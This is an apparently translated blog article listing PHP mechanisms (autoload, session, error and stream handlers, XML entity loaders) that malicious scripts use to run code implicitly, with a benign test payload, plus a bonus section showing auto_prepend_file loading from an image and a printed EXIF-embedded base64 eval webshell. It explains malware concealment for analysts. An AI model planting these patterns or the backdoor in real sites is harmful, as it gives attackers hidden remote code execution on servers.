Advanced methods of implicitly calling php code used in malicious scripts

The logical continuation of the note about implicit calls of php code in malicious scripts will be its second part, in which I will consider more complex and less obvious options for using various handlers and php loaders, and at the end of the article I will give a few examples of how hackers still implicitly cause malicious code and php scripts on the site.

As an example of malicious code, we will use the call again.

echo 'Test' 

')
Since the goal of the article is to show various approaches and mechanisms for hidden code execution, for simplicity, the function that executes our “malicious code” will be declared next to the code it implicitly calls. In real life, the malicious code and its call are far from each other, at least in different php scripts, but more often the code is loaded from the database, image meta data, from another server, and then executed by the eval, assert, preg_replace functions and the like .



Option # 1: use the autoload mechanism.

Malicious code is invoked in an autoload handler when creating a nonexistent class.

 <?php function __autoload($classname) { echo 'Test'; } //... new myEvilClass(); 

Option # 2: use another autoload mechanism in version 5.3 and higher

 <?php // php >= 5.3.0 class EvilClass { static public function evil($name) { echo 'Test'; } } // ... spl_autoload_register(__NAMESPACE__ .'\EvilClass::evil'); // ... new Malware; 

Option number 3: use the session handler.

At the time of the session creation, the registered function will be called.

 <?php function just_do_it() { echo 'Test'; } // ... $f = function() {}; session_set_save_handler("just_do_it", $f, $f, $f, $f, $f); @session_start(); 

Option number 4: use an iterator.

For a change, we will not explicitly declare a function. In the variant below, the function code can be taken from any storage in
as a string and create a function in runtime.

 <?php $f = create_function('', "echo 'Test';"); // ... $it = new ArrayIterator(array('')); iterator_apply($it, $f, array($it)); 

Option number 5: call through an exception handler.

In this version, the code for the call can be passed as an exception text.

 <?php function exception_handler($e) { preg_replace_callback('||', create_function('', $e->getMessage()), ''); } // ... set_exception_handler('exception_handler'); // ... throw new Exception('echo "Test";'); 

Option number 6: use error handler.

The approach is similar to # 5, but the code is implicitly called by the trigger_error () or user_error () methods. The code itself is transmitted through the error text. It is worth noting that this solution works with any error_reporting settings.

 <?php function error_handler($errno, $errstr, $errfile, $errline) { array_map(create_function('', $errstr), array('')); } // ... set_error_handler('error_handler'); $badcode = 'echo "Test";'; trigger_error($badcode, E_USER_ERROR); //  user_error(); 

Option number 7: use your own entity loader.

Works since version 5.4. Malicious code can be in XML tags or in service fields of a document.

 <?php //  php >= 5.4 $xml =<<<XML <!DOCTYPE zlodei PUBLIC "echo 'Test';" "http://example/"> <zlodei>bar</zlodei> XML; $dtd =<<<DTD <!ELEMENT zlodei (#PCDATA)> DTD; libxml_set_external_entity_loader( function ($public, $system, $context) use($dtd) { array_reduce(array(''), create_function('', $public)); } ); // ... $dd = new DOMDocument; $r = $dd->loadXML($xml); @$dd->validate(); 

Option number 8: create your own stream for an implicit code call

A stream handler is registered and any functions supporting work with streams can execute code that can be passed to the url or written to the stream. For a change, instead of the banal eval (), the code is called via create_function ().

 <?php class MalwareStream { function stream_open($path, $mode, $options, &$opened_path) { $url = parse_url($path); $f = create_function('', $url["host"]); $f(); return true; } } // ... stream_wrapper_register("malw", "MalwareStream"); // ... $fp = fopen('malw://echo "Test";', ''); 

Unlike the constructions listed in the previous note , it is quite problematic to detect such implicit code calls in static analysis. Server antivirus scanners cannot do this yet.

Bonus track

What other options do hackers use to download and execute malicious code?

First, the use of php_auto_append / php_auto_prepend directives in the .htaccess file or php.ini. For example,

 php_value auto_prepend_file /images/stories/mycode.jpg 

will execute code from mycode.jpg file before executing any script.

Secondly, dynamic loading of extensions by the dl () function. For this, a .so (* nix) or .dll (windows) module must be compiled. This is quite a rare case, however, and it has a place to be. Advanced hackers can develop and inject modules into Apache or nginx.

Thirdly, there is a construction with back quotes (which is an alias for shell_exec):

 <?php $a = `ls -la`; echo $a; 

It will also execute the system command ls -la, if, of course, shell_exec is enabled in php settings.

And finally, an example of an implicit code call that is loaded from the exif header of a jpeg file.

 <?php $exif = exif_read_data('/home/website/images/stories/food/evil.jpg'); preg_replace($exif['Make'],$exif['Model'],''); 

A jpg file looks like this:

yOya^@^PJFIF^@^A^B^@^@d^@d^@^@ya^@?Exif^@^@II*^@
^H^@^@^@^B^@^O^A^B^@^F^@^@^@&^@^@^@^P^A^B^@m^@^@^@,^@^@^@^@^@^@^@/.*/e^
@ eval ( base64_decode("aWYgKGl zc2V0KCRfUE9TVFsie noxIl0pKSB7ZXZhbChzd
HJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='));
@yi^@^QDucky^@^A^@^D^@^@^@<^@^@yi^@^NAdobe^...

/.*/E is taken from the Make field, @ eval (base64_decode (...)) from the Model field and is executed via preg_replace () due to the “e” modifier.

Thank you for attention.